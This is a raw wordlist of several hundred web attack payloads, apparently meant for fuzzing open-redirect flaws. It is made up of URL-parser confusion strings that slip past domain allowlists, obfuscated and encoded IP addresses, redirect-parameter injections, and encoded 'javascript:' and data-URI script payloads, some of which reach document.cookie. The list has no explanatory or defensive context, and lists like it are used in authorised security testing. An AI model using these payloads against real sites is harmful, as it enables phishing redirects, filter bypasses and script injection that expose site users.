.example.com
/%09/example.com
/%10/example.com
/%13/example.com
/%47/example.com
/%92/example.com
/%09/example.com@example.com
/%09/javascript:alert(1);
/%09/whitelisteddomain.com@example.com
/%0A/example.com
/%0D/example.com
/%2f%2f%2fbing.com%2f%3fwww.omise.co
/%2f%2fexample.com
/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
/%5cexample.com
/%5cexample.com@example.com
/%5cjavascript:alert(1)
/%5cjavascript:alert(1);
/%5cwhitelisteddomain.com@example.com
/%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
/.example.com
//%09/example.com
//%09/example.com@example.com
//%09/whitelisteddomain.com@example.com
//%2fxexample.com
//%5cexample.com
//%5cexample.com@example.com
//%5cjavascript:alert(1)
//%5cjavascript:alert(1);
//%5cwhitelisteddomain.com@example.com
///%09/example.com
///%09/example.com@example.com
///%09/whitelisteddomain.com@example.com
///%5cexample.com
///%5cexample.com@example.com
///%5cwhitelisteddomain.com@example.com
////%09/example.com
////%09/example.com@example.com
////%09/whitelisteddomain.com@example.com
////%5cexample.com
////%5cexample.com@example.com
////%5cwhitelisteddomain.com@example.com
/////example.com
/////example.com/
////\;@example.com
////example.com
////example.com/
////example.com/%2e%2e
////example.com/%2e%2e%2f
////example.com/%2f%2e%2e
////example.com/%2f..
////example.com//
////example.com@example.com/
////example.com@example.com/%2e%2e
////example.com@example.com/%2e%2e%2f
////example.com@example.com/%2f%2e%2e
////example.com@example.com/%2f..
////example.com@example.com//
////whitelisteddomain.com@example.com/
////whitelisteddomain.com@example.com/%2e%2e
////whitelisteddomain.com@example.com/%2e%2e%2f
////whitelisteddomain.com@example.com/%2f%2e%2e
////whitelisteddomain.com@example.com/%2f..
////whitelisteddomain.com@example.com//
////whitelisteddomain.com@www.example.com/%2e%2e
////whitelisteddomain.com@www.example.com/%2e%2e%2f
////whitelisteddomain.com@www.example.com/%2f%2e%2e
////www.example.com/%2e%2e
////www.example.com/%2e%2e%2f
////www.example.com/%2f%2e%2e
///\;@example.com
///example.com
///example.com/
///example.com/%2e%2e
///example.com/%2e%2e%2f
///example.com/%2f%2e%2e
///example.com/%2f..
///example.com//
///example.com@example.com/
///example.com@example.com/%2e%2e
///example.com@example.com/%2e%2e%2f
///example.com@example.com/%2f%2e%2e
///example.com@example.com/%2f..
///example.com@example.com//
///whitelisteddomain.com@example.com/
///whitelisteddomain.com@example.com/%2e%2e
///whitelisteddomain.com@example.com/%2e%2e%2f
///whitelisteddomain.com@example.com/%2f%2e%2e
///whitelisteddomain.com@example.com/%2f..
///whitelisteddomain.com@example.com//
///whitelisteddomain.com@www.example.com/%2e%2e
///whitelisteddomain.com@www.example.com/%2e%2e%2f
///whitelisteddomain.com@www.example.com/%2f%2e%2e
///www.example.com/%2e%2e
///www.example.com/%2e%2e%2f
///www.example.com/%2f%2e%2e
//3H6k7lIAiqjfNeN@example.com+@example.com/
//3H6k7lIAiqjfNeN@example.com@example.com/
//3H6k7lIAiqjfNeN@whitelisteddomain.com+@example.com/
//3H6k7lIAiqjfNeN@whitelisteddomain.com@example.com/
//;@example.com
//XY>.7d8T\205pZM@example.com+@example.com/
//XY>.7d8T\205pZM@example.com@example.com/
//XY>.7d8T\205pZM@whitelisteddomain.com+@example.com/
//XY>.7d8T\205pZM@whitelisteddomain.com@example.com/
//example.com
//example.com+&@example.com#+@example.com/
//example.com/
//example.com/%2e%2e
//example.com/%2e%2e%2f
//example.com/%2f%2e%2e
//example.com/%2f..
//example.com//
//example.com:80#@example.com/
//example.com:80#@whitelisteddomain.com/
//example.com:80?@example.com/
//example.com:80?@whitelisteddomain.com/
//example.com@example.com/
//example.com@example.com/%2e%2e%2f
//example.com@example.com/%2f%2e%2e
//example.com@example.com/%2f..
//example.com@example.com//
//example.com@https:///example.com/%2e%2e
//example.com\@example.com
//example.com\@whitelisteddomain.com
//example.com\texample.com/
//example.com\twhitelisteddomain.com/
//google%00.com
//google%E3%80%82com
//https:///example.com/%2e%2e
//https:///www.example.com/%2e%2e
//https://example.com/%2e%2e%2f
//https://example.com//
//https://example.com@example.com/%2e%2e%2f
//https://example.com@example.com//
//https://whitelisteddomain.com@example.com/%2e%2e%2f
//https://whitelisteddomain.com@example.com//
//https://whitelisteddomain.com@www.example.com/%2e%2e%2f
//https://www.example.com/%2e%2e%2f
//javascript:alert(1)
//javascript:alert(1);
//localdomain%00.pw
//localdomain%E3%80%82pw
//whitelisteddomain.com+&@example.com#+@www.whitelisteddomain.com/
//whitelisteddomain.com@example.com/
//whitelisteddomain.com@example.com/%2e%2e%2f
//whitelisteddomain.com@example.com/%2f%2e%2e
//whitelisteddomain.com@example.com/%2f..
//whitelisteddomain.com@example.com//
//whitelisteddomain.com@https:///example.com/%2e%2e
//whitelisteddomain.com@https:///www.example.com/%2e%2e
//whitelisteddomain.com@www.example.com/%2e%2e%2f
//whitelisteddomain.com@www.example.com/%2f%2e%2e
//www.example.com/%2e%2e%2f
//www.example.com/%2f%2e%2e
/<>//example.com
/?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com
/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redirect_uri=/\/example.com
/?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com
/ReceiveAutoRedirect/false?desiredLocationUrl=http://xssposed.org
/\/\/example.com/
/\/example.com/
/example.com/%2f%2e%2e
/http://%67%6f%6f%67%6c%65%2e%63%6f%6d
/http://example.com
/http:/example.com
/https:/%5cexample.com/
/https://%09/example.com
/https://%5cexample.com
/https://%5cexample.com@example.com
/https://%5cwhitelisteddomain.com@example.com
/https:///example.com/%2e%2e
/https:///example.com/%2f%2e%2e
/https:///example.com@example.com/%2f%2e%2e
/https:///whitelisteddomain.com@example.com/%2f%2e%2e
/https:///whitelisteddomain.com@www.example.com/%2f%2e%2e
/https:///www.example.com/%2f%2e%2e
/https://example.com
/https://example.com/
/https://example.com/%2e%2e
/https://example.com/%2e%2e%2f
/https://example.com/%2f%2e%2e
/https://example.com/%2f..
/https://example.com//
/https://example.com@example.com/
/https://example.com@example.com/%2e%2e
/https://example.com@example.com/%2f%2e%2e
/https://example.com@example.com/%2f..
/https://whitelisteddomain.com@example.com/
/https://whitelisteddomain.com@example.com/%2e%2e
/https://whitelisteddomain.com@example.com/%2f%2e%2e
/https://whitelisteddomain.com@example.com/%2f..
/https://whitelisteddomain.com@www.example.com/%2e%2e
/https://whitelisteddomain.com@www.example.com/%2f%2e%2e
/https://www.example.com/%2e%2e
/https://www.example.com/%2f%2e%2e
/https:example.com
/javascript:alert(1)
/javascript:alert(1);
/redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com
/redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redir=/\/example.com&rurl=/\/example.com&redirect_uri=/\/example.com
/redirect?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com
/x:1/:///%01javascript:alert(document.cookie)/
/〱example.com
/〵example.com
/ゝexample.com
/ーexample.com
/ｰexample.com
127.0.0.1.nip.io
127.1
<>//example.com
<>javascript:alert(1);
@example.com
Javas%26%2399;ript:alert(1)
\/\/example.com/
\152\141\166\141\163\143\162\151\160\164\072alert(1)
\\\\example.com
\\example.com
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=
data:whitelisteddomain.com;text/html;charset=UTF-8,<html><script>document.write(document.domain);</script><iframe/src=xxxxx>aaaa</iframe></html>
example.com#@whitelisteddomain.com
example.com#whitelisteddomain.com
example.com?@whitelisteddomain.com
example.com?whitelisteddomain.com
http://%67%6f%6f%67%6c%65%2e%63%6f%6d
http://.example.com
http://00330.00072.0000326.00000316
http://00330.0x3a.54990
http://00330.3856078
http://0330.072.0326.0316
http://0xd8.072.54990
http://0xd8.0x3a.0xd6.0xce
http://0xd8.3856078
http://0xd83ad6ce
http://127.0.0.1\@whitelisteddomain.com
http://127.0.0.1\\@whitelisteddomain.com
http://3627734734
http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http://3H6k7lIAiqjfNeN@00330.0x3a.54990
http://3H6k7lIAiqjfNeN@00330.3856078
http://3H6k7lIAiqjfNeN@0330.072.0326.0316
http://3H6k7lIAiqjfNeN@0xd8.072.54990
http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http://3H6k7lIAiqjfNeN@0xd8.3856078
http://3H6k7lIAiqjfNeN@0xd83ad6ce
http://3H6k7lIAiqjfNeN@3627734734
http://3H6k7lIAiqjfNeN@472.314.470.462
http://3H6k7lIAiqjfNeN@[::216.58.214.206]
http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http://3H6k7lIAiqjfNeN@example.com+@example.com/
http://3H6k7lIAiqjfNeN@example.com@example.com/
http://3H6k7lIAiqjfNeN@whitelisteddomain.com+@example.com/
http://3H6k7lIAiqjfNeN@whitelisteddomain.com@example.com/
http://472.314.470.462
http://;@example.com
http://XY>.7d8T\205pZM@00330.00072.0000326.00000316
http://XY>.7d8T\205pZM@00330.0x3a.54990
http://XY>.7d8T\205pZM@00330.3856078
http://XY>.7d8T\205pZM@0330.072.0326.0316
http://XY>.7d8T\205pZM@0xd8.072.54990
http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http://XY>.7d8T\205pZM@0xd8.3856078
http://XY>.7d8T\205pZM@0xd83ad6ce
http://XY>.7d8T\205pZM@3627734734
http://XY>.7d8T\205pZM@472.314.470.462
http://XY>.7d8T\205pZM@[::216.58.214.206]
http://XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http://XY>.7d8T\205pZM@example.com+@example.com/
http://XY>.7d8T\205pZM@example.com@example.com/
http://XY>.7d8T\205pZM@whitelisteddomain.com+@example.com/
http://XY>.7d8T\205pZM@whitelisteddomain.com@example.com/
http://[::216.58.214.206]
http://[::ffff:216.58.214.206]
http://example.com#\@whitelisteddomain.com/
http://example.com%23.example.com/
http://example.com%23.whitelisteddomain.com/
http://example.com%2eexample.com/
http://example.com%2f%2f.example.com/
http://example.com%2f%2f.whitelisteddomain.com/
http://example.com%3F.example.com/
http://example.com%3F.whitelisteddomain.com/
http://example.com%5c%5c.example.com/
http://example.com%5c%5c.whitelisteddomain.com/
http://example.com+&@example.com#+@example.com/
http://example.com:80#@example.com/
http://example.com:80#@whitelisteddomain.com/
http://example.com:80%40example.com/
http://example.com:80?@example.com/
http://example.com:80?@whitelisteddomain.com/
http://example.com@00330.00072.0000326.00000316
http://example.com@00330.0x3a.54990
http://example.com@00330.3856078
http://example.com@0330.072.0326.0316
http://example.com@0xd8.072.54990
http://example.com@0xd8.0x3a.0xd6.0xce
http://example.com@0xd8.3856078
http://example.com@0xd83ad6ce
http://example.com@3627734734
http://example.com@472.314.470.462
http://example.com@@whitelisteddomain.com/
http://example.com@[::216.58.214.206]
http://example.com@[::ffff:216.58.214.206]
http://example.com@whitelisteddomain.com/
http://example.com\@@whitelisteddomain.com/
http://example.com\texample.com/
http://example.com\twhitelisteddomain.com/
http://whitelisteddomain.com%2eexample.com/
http://whitelisteddomain.com+&@example.com#+@www.whitelisteddomain.com/
http://whitelisteddomain.com:80%40example.com/
http://whitelisteddomain.com@00330.00072.0000326.00000316
http://whitelisteddomain.com@00330.0x3a.54990
http://whitelisteddomain.com@00330.3856078
http://whitelisteddomain.com@0330.072.0326.0316
http://whitelisteddomain.com@0xd8.072.54990
http://whitelisteddomain.com@0xd8.0x3a.0xd6.0xce
http://whitelisteddomain.com@0xd8.3856078
http://whitelisteddomain.com@0xd83ad6ce
http://whitelisteddomain.com@3627734734
http://whitelisteddomain.com@472.314.470.462
http://whitelisteddomain.com@[::216.58.214.206]
http://whitelisteddomain.com@[::ffff:216.58.214.206]
http://www.example.com\.whitelisteddomain.com
http:/example.com
http:00330.00072.0000326.00000316
http:00330.0x3a.54990
http:00330.3856078
http:0330.072.0326.0316
http:0xd8.072.54990
http:0xd8.0x3a.0xd6.0xce
http:0xd8.3856078
http:0xd83ad6ce
http:3627734734
http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http:3H6k7lIAiqjfNeN@00330.0x3a.54990
http:3H6k7lIAiqjfNeN@00330.3856078
http:3H6k7lIAiqjfNeN@0330.072.0326.0316
http:3H6k7lIAiqjfNeN@0xd8.072.54990
http:3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http:3H6k7lIAiqjfNeN@0xd8.3856078
http:3H6k7lIAiqjfNeN@0xd83ad6ce
http:3H6k7lIAiqjfNeN@3627734734
http:3H6k7lIAiqjfNeN@472.314.470.462
http:3H6k7lIAiqjfNeN@[::216.58.214.206]
http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http:472.314.470.462
http:XY>.7d8T\205pZM@00330.00072.0000326.00000316
http:XY>.7d8T\205pZM@00330.0x3a.54990
http:XY>.7d8T\205pZM@00330.3856078
http:XY>.7d8T\205pZM@0330.072.0326.0316
http:XY>.7d8T\205pZM@0xd8.072.54990
http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http:XY>.7d8T\205pZM@0xd8.3856078
http:XY>.7d8T\205pZM@0xd83ad6ce
http:XY>.7d8T\205pZM@3627734734
http:XY>.7d8T\205pZM@472.314.470.462
http:XY>.7d8T\205pZM@[::216.58.214.206]
http:XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http:[::216.58.214.206]
http:[::ffff:216.58.214.206]
http:example.com
http:example.com@00330.00072.0000326.00000316
http:example.com@00330.0x3a.54990
http:example.com@00330.3856078
http:example.com@0330.072.0326.0316
http:example.com@0xd8.072.54990
http:example.com@0xd8.0x3a.0xd6.0xce
http:example.com@0xd8.3856078
http:example.com@0xd83ad6ce
http:example.com@3627734734
http:example.com@472.314.470.462
http:example.com@[::216.58.214.206]
http:example.com@[::ffff:216.58.214.206]
http:whitelisteddomain.com@00330.00072.0000326.00000316
http:whitelisteddomain.com@00330.0x3a.54990
http:whitelisteddomain.com@00330.3856078
http:whitelisteddomain.com@0330.072.0326.0316
http:whitelisteddomain.com@0xd8.072.54990
http:whitelisteddomain.com@0xd8.0x3a.0xd6.0xce
http:whitelisteddomain.com@0xd8.3856078
http:whitelisteddomain.com@0xd83ad6ce
http:whitelisteddomain.com@3627734734
http:whitelisteddomain.com@472.314.470.462
http:whitelisteddomain.com@[::216.58.214.206]
http:whitelisteddomain.com@[::ffff:216.58.214.206]
https://%09/example.com
https://%09/example.com@example.com
https://%09/whitelisteddomain.com@example.com
https://%5cexample.com
https://%5cexample.com@example.com
https://%5cwhitelisteddomain.com@example.com
https:///example.com/%2e%2e
https:///example.com/%2f%2e%2e
https:///example.com@example.com/%2e%2e
https:///example.com@example.com/%2f%2e%2e
https:///whitelisteddomain.com@example.com/%2e%2e
https:///whitelisteddomain.com@example.com/%2f%2e%2e
https:///whitelisteddomain.com@www.example.com/%2e%2e
https:///whitelisteddomain.com@www.example.com/%2f%2e%2e
https:///www.example.com/%2e%2e
https:///www.example.com/%2f%2e%2e
https://:@example.com\@example.com
https://:@example.com\@whitelisteddomain.com
https://example.com
https://example.com/
https://example.com/%2e%2e%2f
https://example.com/%2f%2e%2e
https://example.com/%2f..
https://example.com//
https://example.com/https://example.com/
https://example.com@example.com
https://example.com@example.com/
https://example.com@example.com/%2e%2e%2f
https://example.com@example.com/%2f%2e%2e
https://example.com@example.com/%2f..
https://example.com@example.com//
https://whitelisteddomain.com/https://example.com/
https://whitelisteddomain.com/https://www.example.com/
https://whitelisteddomain.com@example.com
https://whitelisteddomain.com@example.com/
https://whitelisteddomain.com@example.com/%2e%2e%2f
https://whitelisteddomain.com@example.com/%2f%2e%2e
https://whitelisteddomain.com@example.com/%2f..
https://whitelisteddomain.com@example.com//
https://whitelisteddomain.com@www.example.com/%2e%2e%2f
https://whitelisteddomain.com@www.example.com/%2f%2e%2e
https://whitelisteddomain.com\@t.co
https://www.example.com/%2e%2e%2f
https://www.example.com/%2f%2e%2e
https:example.com
jaVAscript://whitelisteddomain.com//%0d%0aalert(1);//
ja\nva\tscript\r:alert(1)
java%09script:alert(1)
java%0ascript:alert(1)
java%0d%0ascript%0d%0a:alert(0)
java%0dscript:alert(1)
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript://%0aalert(1)
javascript://example.com?%a0alert%281%29
javascript://https://example.com/?z=%0Aalert(1)
javascript://https://whitelisteddomain.com/?z=%0Aalert(1)
javascript://whitelisteddomain.com?%a0alert%281%29
javascript:alert(1)
javascript:alert(1);
localhost.me
localhost\@whitelisteddomain.com
localhost\\@whitelisteddomain.com
whitelisteddomain.com.127.0.0.1.nip.io
whitelisteddomain.com.examle.com
whitelisteddomain.com.example.com
whitelisteddomain.comx.example.com
〱example.com
〵example.com
ゝexample.com
ーexample.com
ｰexample.com
